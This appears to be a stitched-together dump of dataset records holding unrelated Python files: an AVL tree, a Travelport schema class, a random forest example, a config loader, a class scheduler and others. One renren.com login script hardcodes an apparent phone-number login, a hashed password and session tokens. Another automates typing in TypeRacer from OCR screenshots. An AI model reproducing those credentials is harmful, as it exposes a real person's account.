sub.key\n node.value = sub.value\n else:\n if node.hasLeftChild():\n if 
node.isLeftChild():\n node.left.parent = node.parent\n node.parent.left = node.left\n elif node.isRightChild():\n node.left.parent = node.parent\n node.parent.right = node.left\n else:\n node.replace(node.left.key, node.left.value, node.left.left, node.left.right)\n else:\n if node.isLeftChild():\n node.right.parent = node.parent\n node.parent.left = node.right\n elif node.isRightChild():\n node.right.parent = node.parent\n node.parent.right = node.right\n else:\n node.replace(node.right.key, node.right.value, node.right.left, node.right.right)\n\n def rotateLeft(self, node) -> None:\n \"\"\"\n 左旋前:\n E\n F C\n D B\n A\n\n 左旋后:\n C\n E B\n F D A\n\n 左旋步骤:\n - 将右子节点(节点 C)提升为子树的根节点;\n - 将旧根节点(节点 E)作为新根节点的左子节点;\n - 如果新根节点(节点 C)已经有一个左子节点,将其作为新左子节点(节点 E)的右子节点。\n 因为节点 C 之前是节点 E 的右子节点,所以此时节点 E 必然没有右子节点。\n 因此,可以为它添加新的右子节点,而无须过多考虑。\n \"\"\"\n root = node.right\n node.right = root.left\n if root.left is not None:\n root.left.parent = node\n root.parent = node.parent\n if node.isRoot():\n self.root = root\n else:\n if node.isLeftChild():\n node.parent.left = root\n else:\n node.parent.right = root\n root.left = node\n node.parent = root\n node.balanceFactor = node.balanceFactor + 1 - min(root.balanceFactor, 0)\n root.balanceFactor = root.balanceFactor + 1 + max(node.balanceFactor, 0)\n\n def rotateRight(self, node) -> None:\n \"\"\"\n 右旋前:\n E\n C F\n B D\n A\n\n 右旋后:\n C\n B E\n A D F\n\n 右旋步骤:\n - 将左子节点(节点 C)提升为子树的根节点;\n - 将旧根节点(节点 E)作为新根节点的右子节点;\n - 如果新根节点(节点 C)已经有一个右子节点(节点 D),将其作为新右子节点(节点 E)的左子节点。\n 因为节点 C 之前是节点 E 的左子节点,所以此时节点 E 必然没有左子节点。\n 因此,可以为它添加新的左子节点,而无须过多考虑。\n \"\"\"\n root = node.left\n node.left = root.right\n if root.right is not None:\n root.right.parent = node\n root.parent = node.parent\n if node.isRoot():\n self.root = root\n else:\n if node.isRightChild():\n node.parent.right = root\n else:\n node.parent.left = root\n root.right = node\n node.parent = root\n node.balanceFactor = node.balanceFactor + 1 - min(root.balanceFactor, 0)\n root.balanceFactor = root.balanceFactor + 1 + max(node.balanceFactor, 0)\n","sub_path":"python/tree/f/avl_search_tree.py","file_name":"avl_search_tree.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"587695171","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\n\n__NAMESPACE__ = \"http://www.travelport.com/schema/common_v32_0\"\n\n\n@dataclass\nclass BillingPointOfSaleInfo3:\n \"\"\"\n Point of Sale information for Billing.\n\n Parameters\n ----------\n origin_application\n Name of the Point of Sale application which initiated the\n Request.This information will be provided as part of the\n provisioning of the user.\n cidbnumber\n A 10 Digit customer number generated by CIDB system.\n \"\"\"\n class Meta:\n name = \"BillingPointOfSaleInfo\"\n namespace = \"http://www.travelport.com/schema/common_v32_0\"\n\n origin_application: None | str = field(\n default=None,\n metadata={\n \"name\": \"OriginApplication\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n cidbnumber: None | str = field(\n default=None,\n metadata={\n \"name\": \"CIDBNumber\",\n \"type\": \"Attribute\",\n \"pattern\": r\"\\d{10}\",\n }\n )\n","sub_path":"travelport/models/billing_point_of_sale_info_3.py","file_name":"billing_point_of_sale_info_3.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"395153165","text":"\n\n\n#登录\n\nimport 
requests\n\n\ndef login():\n s=requests.Session()\n url='http://www.renren.com/ajaxLogin/login?1=1&uniqueTimestamp=2021032259446'\n data={'email':'13693689954','icode':'','origURL':'http://www.renren.com/home',\n 'domain':'renren.com','key_id':'1','captcha_type':'web_login',\n 'password':'66c479fcdcf98146e021ce8bf614560351b4902edb951bb0ae4fcb4d56f5c4bb',\n 'rkey':'d0cf42c2d3d337f9e5d14083f2d52cb2',\n 'f':'http%3A%2F%2Fwww.renren.com%2F877521005'}\n headers={'Content-Type':'application/x-www-form-urlencoded',\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}\n\n\n r=s.post(url=url,data=data,headers=headers)\n return s\n#登录成功进入个人主页\ndef profile():\n r=login().get(url='http://www.renren.com/877521005')\n print(r.text)\n\n#上传照片接口\ndef upload():\n url='http://upload.renren.com/upload.fcgi?pagetype=nphoto&hostid=877521005&uploadid=1609943209084'\n data={'requestToken':'772812890','_rtk':'f9d12eb4'}\n files={'file':('login.yaml.jpg',open(r'C:\\Users\\Administrator\\Desktop\\20a259868d31ebaa482a6dd4da46652.png','rb'),'image/jpeg',{})}\n headers={'Content-Type':'multipart/form-data'}\n r=login().post(url=url,data=data,files=files,headers=headers)\n","sub_path":"request/文件上传.py","file_name":"文件上传.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"282932486","text":"import sys\r\nimport csv\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.preprocessing import label_binarize\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score as accuracy\r\nfrom sklearn.metrics import roc_curve, auc\r\n\r\ndef get_dataset_from_csv(filename):\r\n \"\"\"Retrieves data from csv file and stores it in numpy arrays\r\n Takes filename\r\n Returns x (raw data), y (indexed labels)\r\n \"\"\"\r\n x = None\r\n y = None\r\n # Open data file\r\n with open(filename, newline='') as stream:\r\n # On successfully opening a stream, count number of lines\r\n num_lines = sum(1 for line in stream)\r\n # Reset filestream to beginning of file\r\n stream.seek(0)\r\n # Instantiate csv reader for file\r\n reader = csv.reader(stream)\r\n\r\n # Read first line of file to get shape and instantiate arrays\r\n row = next(reader)\r\n x = np.zeros((num_lines, len(row)-1), dtype=np.float32)\r\n y = np.zeros(num_lines, dtype=np.int32)\r\n # Add first line to dataset\r\n i = 0\r\n x[i,:] = np.array(row[:-1]).astype(np.float32)\r\n y[i] = int(row[-1].startswith('m'))\r\n i = i + 1\r\n # Add rest of lines to dataset\r\n for row in reader:\r\n x[i,:] = np.array(row[:-1]).astype(np.float32)\r\n y[i] = int(row[-1].startswith('m'))\r\n i = i + 1\r\n return x, y\r\n\r\ndef normalize_columns(data):\r\n \"\"\"Normalize the features to have mean 0 and standard deviation 1\r\n This is done for numerical stability\r\n \"\"\"\r\n stds = np.std(data, axis=0)\r\n mus = np.mean(data, axis=0)\r\n return np.divide(np.subtract(data, mus),stds)\r\n\r\n\r\n# Execute this if this file is run as __main__\r\nif __name__ == '__main__':\r\n # First command line argument is filename\r\n data, labels = get_dataset_from_csv(\"data.csv\")\r\n if data is None:\r\n print(\"Error reading file %s\" % sys.argv[1])\r\n sys.exit(1)\r\n\r\n # Normalize data\r\n data = normalize_columns(data)\r\n\r\n n_trials = 10\r\n # Train n_trials random forests and report mean and stdev for 
accuracy\r\n accuracies = []\r\n aucs = []\r\n importances = np.zeros((n_trials,data.shape[1]))\r\n\r\n # Compute ROC curve and ROC area for each class\r\n roc_auc = dict()\r\n\r\n for i in range(0, n_trials):\r\n (\r\n X_train, X_test, y_train, y_test\r\n ) = train_test_split(data, labels, test_size=0.1)\r\n\r\n # Train random forest\r\n classifier = RandomForestClassifier(n_estimators=20)\r\n classifier.fit(X_train, y_train)\r\n importances[i,:] = classifier.feature_importances_\r\n accuracies = accuracies + [accuracy(y_test, classifier.predict(X_test))]\r\n\r\n y_score = classifier.fit(X_train, y_train).predict_proba(X_test)\r\n\r\n fpr, tpr, _ = roc_curve(y_test, y_score[:,1], pos_label=1)\r\n aucs = aucs + [auc(fpr, tpr)]\r\n\r\n\r\n print(\"Mean Accuracy: %0.3f\\nStandard Deviation: %0.3f\" % (np.mean(accuracies), np.std(accuracies)))\r\n print(\"Importances: \", np.mean(importances, axis=0))\r\n print(\"Mean AUC: %f\" % np.mean(aucs))\r\n\r\n\r\n fpr, tpr, _ = roc_curve(y_test, y_score[:,1], pos_label=1)\r\n aucs = aucs + [auc(fpr, tpr)]\r\n\r\n\r\n plt.figure()\r\n lw = 2\r\n plt.plot(fpr, tpr, color='darkorange',\r\n lw=lw, label='ROC curve (area = %0.2f)' % aucs[-1])\r\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\r\n plt.xlim([0.0, 1.0])\r\n plt.ylim([0.0, 1.05])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title('ROC For Malignant Class')\r\n plt.legend(loc=\"lower right\")\r\n plt.show()\r\n\r\n fpr, tpr, _ = roc_curve(y_test, y_score[:,0], pos_label=0)\r\n aucs = aucs + [auc(fpr, tpr)]\r\n\r\n\r\n plt.plot(fpr, tpr, color='darkorange',\r\n lw=lw, label='ROC curve (area = %0.2f)' % aucs[-1])\r\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\r\n plt.xlim([0.0, 1.0])\r\n plt.ylim([0.0, 1.05])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title('ROC For Benign Class')\r\n plt.legend(loc=\"lower right\")\r\n plt.show()\r\n","sub_path":"random_forest_example/randomforest.py","file_name":"randomforest.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"230573491","text":"import configparser\nimport os\nfrom platform import system\nfrom utils.util import JsonUtil, HttpUtil, FileUtil\n\nfrom utils.log import Logger\nfrom utils.aspect import singleton\n\n\n@singleton\nclass Configs(object):\n '''\n classdocs\n '''\n __config = None\n\n logger = Logger().getLogger()\n\n def __init__(self, alternative_file=''):\n cfg_file = os.environ.get(\"CONFIG_FILE\", os.path.abspath('nemesismiddleware.cfg'))\n\n self.logger.info('carregando confs, file=%s' % cfg_file)\n\n if not FileUtil.fileExists(cfg_file):\n if FileUtil.fileExists(alternative_file):\n self.logger.info(\"loadding alternative file: %s\" % alternative_file)\n cfg_file = alternative_file\n else:\n raise Exception(\"error loading config: file not found: \" + cfg_file)\n\n '''\n Constructor\n '''\n self.__loadConfig(cfg_file)\n\n def __loadConfig(self, filename):\n self.__config = configparser.RawConfigParser()\n self.__config.read(filename)\n\n def getConfig(self, filename):\n if not self.__config:\n self.__loadConfig(filename)\n return self.__config\n\n def get(self, section, propertyName, defaultValue=None):\n if not self.__config:\n raise Exception(\"config not loaded\")\n value = self.__config.get(section, propertyName)\n value = value if value else defaultValue\n return value\n\n def getKeyList(self, section, propertyName):\n 
return self.get(section, propertyName).split('|')\n\n def get_app_settings(self):\n return JsonUtil.decode(self.__load_remote_config_file(self.get('app', 'web-url-settings')))\n\n def get_locale(self):\n import locale\n try:\n if system() == \"Windows\":\n br_locale = \"ptb_bra\"\n else:\n br_locale = (\"pt_BR\", \"UTF-8\")\n locale.setlocale( locale.LC_ALL, br_locale)\n except locale.Error:\n self.logger.exception(\"setup locale error\")\n return locale\n\n def __load_remote_config_file(self, url_or_path):\n settings = None\n if(url_or_path.startswith(\"http\")):\n settings = HttpUtil.get_url(url_or_path)\n else:\n with open(url_or_path, 'r') as f:\n settings = f.read()\n\n if (not settings):\n raise Exception(\"settings is empty: %s\" % url_or_path)\n return settings","sub_path":"elasticsearch/src/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"136575213","text":"import pytesseract\nfrom PIL import Image\nimport time\nimport pyautogui\nimport cv2\nimport numpy as np\nprint(\"move to the first position\")\ntime.sleep(2)\nx1, y1 = pyautogui.position()\nprint(\"move to the second position\")\ntime.sleep(2)\nx2, y2 = pyautogui.position()\nscreenshot = pyautogui.screenshot(region=(x1, y1, x2 - x1, y2-y1))\nscreenshot.save('screenshot.png')\nimage = cv2.imread(\"screenshot.png\")\n# hsv=cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n#\n# white_lo = np.array([0,0,170])\n# white_hi = np.array([18i0, 255,255])\n# mask = cv2.inRange(hsv, white_lo, white_hi)\n# image[mask>0]=(255,255,255)\n\n# text_lo=np.array([0,0,0])\n# text_hi=np.array([180,255,120])\n# mask = cv2.inRange(hsv, text_lo, text_ho)\n# image[mask>0]=(0,0,0)\n\ncv2.imwrite(\"screenshot.png\", image)\ntext = pytesseract.image_to_string(Image.open(\"screenshot.png\"))\nif text[0] == '|':\n text = text[1::]\nelif text[0] == 'i':\n text = 'I' + text[1::]\n\ntext = text.replace('|', 'I')\nistext = text.replace('[', '')\ntext = text.replace('\\n', ' ')\ntext = text.replace('(', '')\nprint(\"move to the text box\")\ntime.sleep(2)\npyautogui.typewrite(text, interval=0.035)\nprint(text)\n\n","sub_path":"type_racer_main.py","file_name":"type_racer_main.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"330015269","text":"######################################\n########0)Set up permutations#########\n######################################\n\n#####UPDATE ALLCLASSASSIGNMENTS EVER LOOP\n\nimport itertools\nimport math\nimport random\nimport sys\n\npermutations=[]\nsublist=[]\nallClassAssignments=[[],[],[],[],[],[]]\n\nfor x in itertools.permutations('1'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('12'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('123'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('1234'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('12345'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('123456'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\n\n##########################\n########1) Objects###########\n##########################\n\nclass Teacher(object):\n def __init__(self, name, subjects,teacherNumber,restrictions): #Initalizes 
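The `Configs` class above depends on a `@singleton` decorator imported from `utils.aspect`, whose implementation is not shown. A minimal sketch of the pattern it likely resembles (hypothetical, not the project's actual code):

```python
def singleton(cls):
    """Decorator that caches and returns a single instance per decorated class."""
    instances = {}

    def get_instance(*args, **kwargs):
        if cls not in instances:
            instances[cls] = cls(*args, **kwargs)
        return instances[cls]
    return get_instance


@singleton
class Config:
    def __init__(self):
        print("loaded once")


a, b = Config(), Config()   # prints "loaded once" a single time
assert a is b
```

Because the decorator caches one instance per class, repeated `Configs()` calls share the same parsed configuration, which is why the constructor can afford to read the config file eagerly.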
teacher\n self.name=name\n self.subjects=subjects\n self.iteration=0;\n self.newSubjects=subjects\n self.teacherNumber=teacherNumber\n self.restrictions=[]\n if restrictions:\n for i in range(1,len(restrictions)):\n self.restrictions.append(restrictions[i])\n \n #def periodRestriction(self, period): #Restricts teacher from teaching at a particular period\n # self.restrictions.append(period)\n def getName(self): #Returns name\n return self.name\n def getSubjects(self): #Returns subjects\n return self.subjects\n def getSubject(self, index): #Returns particular subject\n self.arrangeSubjects()\n return self.subjects[index]\n def getIteration(self): #Returns iterations\n return self.iteration\n def iterate(self): #Increments iterations\n self.iteration=self.iteration+1\n def backTrack(self): #Decrements iterations\n self.iteration=self.iteration-1\n def clearIterations(self): #Clears iterations\n self.iteration=0\n ##Clear subject period assignments\n for i in range(0,len(self.subjects)):\n self.subjects[i].setPeriod(-1)\n def finalIteration(self): #Tests for final iteration\n\n #if self.iteration==math.factorial(len(self.subjects)):\n #print(\"Final iteration at: \" + str(self.iteration))\n #numberOfSubjects=len(self.subjects)\n #print(permutations[numberOfSubjects-1][self.iteration])\n if self.iteration==720:\n return True\n else:\n return False\n def lackingTogetherness(self): #Check no problem with other periods that this class should be with\n #Need to check for no previous classes scheduled\n togethernessCounter=0\n classesPreviouslyScheduled=0\n for j in range(0,len(self.subjects)):\n if self.subjects[j].together!=[]: #Check if class must be with another class\n togethernessCounter+=1\n togetherPeriod=self.subjects[j].getPeriod()\n ##Check for one together class at same time\n for i in range(0,len(allSubjects)):\n if self.subjects[j].together==allSubjects[i].getName():\n if allSubjects[i].getPeriod()!=-1:\n classesPreviouslyScheduled+=1\n if togetherPeriod==allSubjects[i].getPeriod():\n togethernessCounter-=1 #Together class schedule at this period \n if togethernessCounter==0 or classesPreviouslyScheduled==0: #No classes need to be scheduled together\n return False\n else:\n return True #No schedule classes were found\n\n \n\n def conflict(self): #Tests for conflict\n self.arrangeSubjects()\n ##1) Check for required corresponding classes##\n if self.lackingTogetherness()==True: #If togetherness conflict, return true\n return True\n numberOfSubjects=len(self.subjects)\n ##2) Test for restrictions##\n for i in range(0,numberOfSubjects): #Test for period restrictions\n if str(self.subjects[i].getPeriod()) in self.restrictions:\n return True\n\n ##3) Test for first teacher## \n if self.name==teachers[0].getName(): #Aside for restrictions, no conflict for first teacher\n return False\n\n \n ##4) Check for too many classes at once per grade##\n #Get all core subjects and check for any period that has more than three grade and core classes\n #currentPeriodAssignments.checkForGradeOrCoreOverlaps()\n for grade in range(0,6): #Iterate through grades\n periodTally=[0,0,0,0,0,0]\n for i in range(0,len(allClassAssignments[grade])): #Iterate through particular classes\n assignedPeriod=allClassAssignments[grade][i].getPeriod()\n if assignedPeriod>0:\n portionOfClassAssigned=1/float(allClassAssignments[grade][i].getSize())\n periodTally[assignedPeriod-1]+=portionOfClassAssigned\n #Conflict if 3 or more of same class in period:\n if periodTally[assignedPeriod-1]>1: #Conflict if more than 100percent of 
grade assigned same problem\n return True\n #Conflict if 2 or more doubled classes\n ##>>> ADD CODE HERE\n \n\n \n \n \n ## Old method of checking## \n #for i in range(0,self.teacherNumber): #Check for conclicts with all other subjects\n # otherNumberOfSubjects=len(teachers[i].getSubjects())\n # for j in range(0,numberOfSubjects):\n # for k in range(0,otherNumberOfSubjects):\n # if teachers[i].getSubject(k).conflictsWith(self.subjects[j]):\n # return True\n ##\n return False\n def arrangeSubjects(self):\n numberOfSubjects=len(self.subjects)\n for i in range(0,numberOfSubjects):\n iterationIndex=int(permutations[5][self.iteration][i])\n self.subjects[i].setPeriod(iterationIndex)\n\n # allClassAssignments=[[],[],[],[],[],[]]\n # for j in range(0,numberOfTeachers):\n # for k in range(0,len(teachers[j].getSubjects())):\n # allClassAssignments[int(teachers[j].getSubjects()[k].getGrade())-7].append(teachers[j].getSubjects()[k])\n\n\n def getSubjectOrder(self): #Broken\n return permutations[numberOfSubjects-1][self.iteration]\n def getSubjectsString(self): #Returns subjects ordered according to iteration\n subjectsString=\"\"\n self.arrangeSubjects()\n for period in range(1,7):\n subjectsString=subjectsString+\"\\nPeriod \"+str(period)+\": \"\n for i in range(0,len(self.subjects)):\n if self.subjects[i].getPeriod()==period:\n subjectGrade=self.subjects[i].getGrade()\n subjectTitle=self.subjects[i].getSubjectTitle()\n subjectsString=subjectsString+subjectGrade+\"th \" + subjectTitle\n subjectsString=subjectsString+\"\\n\"\n return subjectsString\n \n \n \n \n\nclass Subject(object):\n def __init__(self, name, teacherIndex): #Initalizes subject\n self.name=name;\n if name[0]==\"1\": #If 10th, 11th, or 12th, take two numbers for grade\n self.grade=name[0:2]\n self.subjectTitle=name[2:len(name)-1] #Find subject appropriately\n elif name[0]==\"7\" or name[0]==\"8\" or name[0]==\"9\":\n self.grade=name[0]\n self.subjectTitle=name[1:len(name)-1]\n self.teacherIndex=teacherIndex\n self.period=-1\n self.roster=[]\n self.together=[]\n self.size=name[-1]\n allClassAssignments[int(self.grade)-7].append(self) #Update total class list\n for i in range(0,len(rosters)):\n if self.name==rosters[i][0]:\n self.roster=rosters[i][1:len(rosters[i])]\n if self.roster:\n print(self.name)\n print(self.roster)\n for i in range(0,len(together)):\n if self.name==together[i][0]:\n self.together=together[i][1]\n if self.together:\n print(str(self.name) + \" with \" + str(self.together))\n def getName(self): #Returns name\n return self.name\n def getSubjectTitle(self): #Returns name\n return self.subjectTitle\n def getRoster(self): #Returns roster\n return self.roster\n def getGrade(self): #Returns grade\n return self.grade\n def getPeriod(self): #Returns period\n return self.period\n def getSize(self): #Returns size\n return self.size\n def setPeriod(self, period): #Sets period\n self.period=period \n def rosterConflictWith(self, otherSubject): #Checks if two subjects have a roster conflict\n if self.roster==[]:\n return False #Assume no conflict if no roster\n for i in range(0,len(self.roster)):\n if self.roster[i] in otherSubject.roster:\n return True\n def conflictsWith(self, otherSubject): #Tests if two subjects conflict\n\n \n #Ensure that this period matches with period of other class or class is not schedule\n if otherSubject.getGrade()==self.grade:\n if self.rosterConflictWith(otherSubject) or otherSubject.getSection()==self.section:\n if otherSubject.getPeriod()==self.period: \n return True\n \n \n return False\n 
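The `conflict` method above counts each scheduled class as a fraction `1/size` of its grade per period and flags any period whose tally exceeds 1, i.e. more than 100% of a grade booked at once. A sketch of that tally in isolation (interpreting `size` as the number of sections a class is split into is an assumption; the tuple layout is simplified for illustration):

```python
def grade_overbooked(classes, num_periods=6):
    """classes: list of (assigned_period, num_sections) for one grade.
    A class split into num_sections only occupies 1/num_sections of the
    grade per period, so a period is overbooked when its sum exceeds 1."""
    tally = [0.0] * num_periods
    for period, num_sections in classes:
        if period > 0:                       # -1 means "not yet scheduled"
            tally[period - 1] += 1.0 / num_sections
            if tally[period - 1] > 1:
                return True
    return False

print(grade_overbooked([(1, 1), (1, 2)]))    # True: 1 + 0.5 > 100% of the grade
print(grade_overbooked([(1, 2), (1, 2)]))    # False: exactly 100%
```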
\n\n\n##########################\n#####2) Read file#########\n##########################\noriginalFile=open('classes','r')\nrawData=originalFile.readlines()\nteachers=[]\ndata=[]\nfor line in rawData:\n data.append(line.split())\n\noriginalFile.close()\n\n\n####################################################\n#####3) Create Teacher and class objects############\n####################################################\n## Test for rosters\nrosterIndex=0\nteacherIndex=0\ntogetherIndex=0\ni=0\nrosters=[]\ntogether=[]\nallSubjects=[]\n\nwhile teacherIndex==0 and iRepeat:\"+allSubjects[i].getName())\n # sys.exit()\n subjectNames.append(allSubjects[i].getName())\n\n#Section conflict tally\nperiod1ConflictTally=[0,0,0,0,0,0]\nperiod2ConflictTally=[0,0,0,0,0,0]\nperiod3ConflictTally=[0,0,0,0,0,0]\n\nfor i in range(0,len(allSubjects)):\n if subjectNames[i][-1]==\"1\" and subjectNames[i][0]==\"7\":\n period1ConflictTally[0]=period1ConflictTally[0]+1\n if subjectNames[i][-1]==\"1\" and subjectNames[i][0]==\"8\":\n period1ConflictTally[1]=period1ConflictTally[1]+1\n if subjectNames[i][-1]==\"2\" and subjectNames[i][0]==\"7\":\n period2ConflictTally[0]=period2ConflictTally[0]+1\n if subjectNames[i][-1]==\"2\" and subjectNames[i][0]==\"8\":\n period2ConflictTally[1]=period2ConflictTally[1]+1\n if subjectNames[i][-1]==\"3\" and subjectNames[i][0]==\"7\":\n period3ConflictTally[0]=period3ConflictTally[0]+1\n if subjectNames[i][-1]==\"3\" and subjectNames[i][0]==\"8\":\n period3ConflictTally[1]=period3ConflictTally[1]+1\n\n#print(\"Section 1 Conflict Tally\")\n#print(period1ConflictTally)\n#print(\"Section 2 Conflict Tally\")\n#print(period2ConflictTally)\n#print(\"Section 3 Conflict Tally\")\n#print(period3ConflictTally)\n\n\n#periodAssignments=[[],[],[],[],[],[]]\n\n##Build Period assignments\n#for i in range(0,len(teachers)): #For each teacher\n# tempSubjects=teachers.getSubjects()\n# for i in range(0,len(tempSubjects)): #For each of their subjects\n #Log period assignment\n \n#for i in range(0,6):\n# for j in range(0,len(allClassAssignments[i])):\n# print(allClassAssignments[i][j].getName())\nallClassAssignments1=allClassAssignments\nallClassAssignments=[[],[],[],[],[],[]]\nfor j in range(0,numberOfTeachers):\n for k in range(0,len(teachers[j].getSubjects())):\n allClassAssignments[int(teachers[j].getSubjects()[k].getGrade())-7].append(teachers[j].getSubjects()[k])\nif allClassAssignments1==allClassAssignments:\n print(\"Copied\")\n\n### Main Loop ###\ni=0 \n\nwhile i bot\n top_to_bot_float = np.matrix([[0.0] * N] * N)\n top_to_bot_bool = np.matrix([[True] * N] * N)\n # bot -> top\n bot_to_top_float = np.matrix([[0.0] * N] * N)\n bot_to_top_bool = np.matrix([[True] * N] * N)\n # left -> right\n left_to_right_float = np.matrix([[0.0] * N] * N)\n left_to_right_bool = np.matrix([[True] * N] * N)\n # right -> left\n right_to_left_float = np.matrix([[0.0] * N] * N)\n right_to_left_bool = np.matrix([[True] * N] * N)\n\n for i in range(N):\n for j in range(N):\n # top -> bot\n if i != N - 1:\n top_to_bot_bool[i, j] = abs(matrix[i, j] - matrix[i+1, j]) < 1\n # bot -> top\n if i != 0:\n bot_to_top_bool[i, j] = abs(matrix[i, j] - matrix[i-1, j]) < 1\n # left -> right\n if j != N - 1:\n left_to_right_bool[i, j] = abs(matrix[i, j] - matrix[i, j+1]) < 1\n # right -> left\n if j != 0:\n right_to_left_bool[i, j] = abs(matrix[i, j] - matrix[i, j-1]) < 1\n \n\n for i in range(N):\n for j in range(N):\n top_to_bot_bool[i, j] = not(top_to_bot_bool[i, j]) or not(left_to_right_bool[i, j])\n \n n = n.split(\".\")[0]\n\n # 
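The scheduler's preamble precomputes every ordering of the period labels `'1'` through `'123456'` with `itertools.permutations`, so a teacher's iteration counter indexes directly into a fixed table of subject orderings. An equivalent, more compact construction of that table:

```python
import itertools

# permutations[n-1][i] is the i-th ordering of n period labels
permutations = [list(itertools.permutations('123456'[:n])) for n in range(1, 7)]

print(len(permutations[5]))    # 720 == 6!, the bound used by finalIteration()
print(permutations[2][0])      # ('1', '2', '3')
```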
overview\n plt.imshow(matrix, interpolation='nearest', cmap='hot')\n plt.savefig(\"extras/\"+n+\"-heatmap.png\", bbox_inches='tight')\n\n # bool\n # top -> bot\n plt.imshow(top_to_bot_bool, interpolation='nearest', cmap='Greys_r', vmin=0, vmax=1)\n plt.savefig(\"extras/\"+n+\"-top_to_bot_bool.png\", bbox_inches='tight')\n\nif __name__ == '__main__':\n name = input(\"Datei visualisieren: \")\n possible_paths(name)\n","sub_path":"Bwinf-Aufgabe2-Wildschweine/heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"255908855","text":"# Test image loading\r\nimport pstats\r\nimport cProfile\r\n\r\nimport pygame\r\nimport Code.imagesDict as images\r\npygame.display.set_mode((600, 400))\r\n\r\ndef main():\r\n IMAGESDICT, UNITDICT, ICONDICT, ITEMDICT, ANIMDICT = images.getImages()\r\n assert len(IMAGESDICT) > 0\r\n assert len(UNITDICT) > 0\r\n assert len(ICONDICT) > 0\r\n assert len(ITEMDICT) > 0\r\n\r\nif __name__ == '__main__':\r\n cProfile.run(\"main()\", \"Profile.prof\")\r\n s = pstats.Stats(\"Profile.prof\")\r\n s.strip_dirs().sort_stats(\"time\").print_stats(10)\r\n","sub_path":"Tests/test_image_load.py","file_name":"test_image_load.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"506605994","text":"from resnet_1 import *\nfrom datetime import datetime\nimport time, datetime\nimport os\nimport math\nimport argparse\n# from resnet_1_input import *\nfrom processing import batchdispenser, kaldiIO\n#import pandas as pd\n\n\nclass Train(object):\n '''\n This Object is responsible for all the training and validation process\n '''\n\n def __init__(self):\n # Set up all the placeholders\n self.placeholders()\n\n def placeholders(self):\n '''\n There are five placeholders in total.\n image_placeholder and label_placeholder are for train images and labels\n vali_image_placeholder and vali_label_placeholder are for validation imgaes and labels\n lr_placeholder is for learning rate. Feed in learning rate each time of training\n implements learning rate decay easily\n '''\n self.input_placeholder = tf.placeholder(dtype=tf.float32,\n shape=[FLAGS.train_batch_size, INPUT_HEIGHT,\n INPUT_WIDTH, INPUT_DEPTH])\n self.label_placeholder = tf.placeholder(dtype=tf.int32, shape=[FLAGS.train_batch_size])\n\n #self.vali_input_placeholder = tf.placeholder(dtype=tf.float32, shape=[FLAGS.validation_batch_size,\n # INPUT_HEIGHT, INPUT_WIDTH, INPUT_DEPTH])\n #self.vali_label_placeholder = tf.placeholder(dtype=tf.int32, shape=[FLAGS.validation_batch_size])\n\n self.lr_placeholder = tf.placeholder(dtype=tf.float32, shape=[])\n\n self.is_training_placeholder = tf.placeholder(dtype=tf.bool, shape=[])\n\n #self.reuse_placeholder = tf.placeholder(dtype=tf.bool, shape=[])\n\n def build_train_validation_graph(self):\n '''\n This function builds the train graph and validation graph at the same time.\n\n '''\n global_step = tf.Variable(0, trainable=False)\n validation_step = tf.Variable(0, trainable=False)\n\n # Logits of training data and valiation data come from the same graph. The inference of\n # validation data share all the weights with train data. 
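`test_image_load.py` above profiles the image-loading test with `cProfile` and prints the ten most expensive calls via `pstats`. The same stdlib pattern applied to an arbitrary function:

```python
import cProfile
import pstats


def work():
    return sum(i * i for i in range(100000))


# run the statement under the profiler and dump raw stats to a file
cProfile.run("work()", "Profile.prof")

s = pstats.Stats("Profile.prof")
# strip directory paths, sort by internal time, show the top 10 entries
s.strip_dirs().sort_stats("time").print_stats(10)
```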
